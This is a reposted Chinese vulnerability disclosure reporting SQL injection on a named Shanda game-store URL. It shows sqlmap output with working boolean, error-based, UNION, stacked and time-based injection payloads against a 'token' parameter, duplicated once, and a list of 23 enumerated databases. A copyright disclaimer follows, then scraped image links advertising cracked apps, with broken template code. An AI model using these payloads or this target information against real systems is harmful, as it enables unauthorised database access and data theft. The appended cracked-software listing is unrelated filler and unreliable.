盛大分站存在SQL注入
http://store.aion.sdo.com:9101/project/20140506/index.aspx?token=
Place: GET
Parameter: token
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: token='; IF(7189=7189) SELECT 7189 ELSE DROP FUNCTION pvfg--
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: token=' AND 6557=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(115)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6557=6557) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(107)+CHAR(113))) AND 'nflh'='nflh
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: token=' UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(115)+CHAR(109)+CHAR(113)+CHAR(73)+CHAR(116)+CHAR(88)+CHAR(80)+CHAR(83)+CHAR(89)+CHAR(107)+CHAR(71)+CHAR(87)+CHAR(69)+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: token='; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: token=' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: token
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: token='; IF(7189=7189) SELECT 7189 ELSE DROP FUNCTION pvfg--
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: token=' AND 6557=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(115)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (6557=6557) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(107)+CHAR(113))) AND 'nflh'='nflh
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: token=' UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(115)+CHAR(109)+CHAR(113)+CHAR(73)+CHAR(116)+CHAR(88)+CHAR(80)+CHAR(83)+CHAR(89)+CHAR(107)+CHAR(71)+CHAR(87)+CHAR(69)+CHAR(113)+CHAR(113)+CHAR(99)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: token='; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: token=' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] AgeProxyDB
[*] AgeProxyLogDB
[*] AionGuild
[*] AionLogProxy
[*] AionShop_AppData
[*] AionShop_BaseData
[*] AionShop_SysLog
[*] AionShop_TradeData
[*] BF_Team
[*] master
[*] model
[*] msdb
[*] RiftGuild
[*] RiftMiniShop_Basedata
[*] RiftMiniShop_SysLog
[*] RiftMiniShop_TradeData
[*] RiftShop_Basedata
[*] RiftShop_SysLog
[*] RiftShop_TradeData
[*] SeapCommonDB
[*] SmsProxy
[*] SNDC
[*] tempdb
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;
![英雄棋士团(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/yingxiongqishituanyuxiazai.jpg)
![美食小当家?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/meishixiaodangjia.png)
![2047?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/2047.jpg)
![荣誉指挥官(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/rongyuzhihuiguanyuxiazai.png)
![繁荣美食市场物语?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/fanrongmeishishichangwuyu.jpg)
![夸克浏览器 v4.2.1.138 好用的手机浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/kuakezuolanqi.jpg)
![移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/yidongbangongruanjian.jpg)
![乐秀视频编辑器 VideoShow v8.8.4 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/lexiushipinbianjiqi.png)
![X 浏览器 v3.3.9 一款小巧的安卓浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/x.jpg)
![安卓密码管理软件 Enpass v6.4.5.368 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/anzhuomimaguanliruanjian.jpg)
![差分复制同步 FastCopy-M v3.6.3.51 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/FastCopy3.png)
![多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Clover.png)
![文件重命名 Advanced Renamer v3.85 Lite 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Advanced_Renamer.png)
![网络防火监控 GlassWire Elite v2.1.166 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/GlassWire.png)
![影音播放器 Daum Potplayer v1.7.20538 美化便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/PotPlayer.png)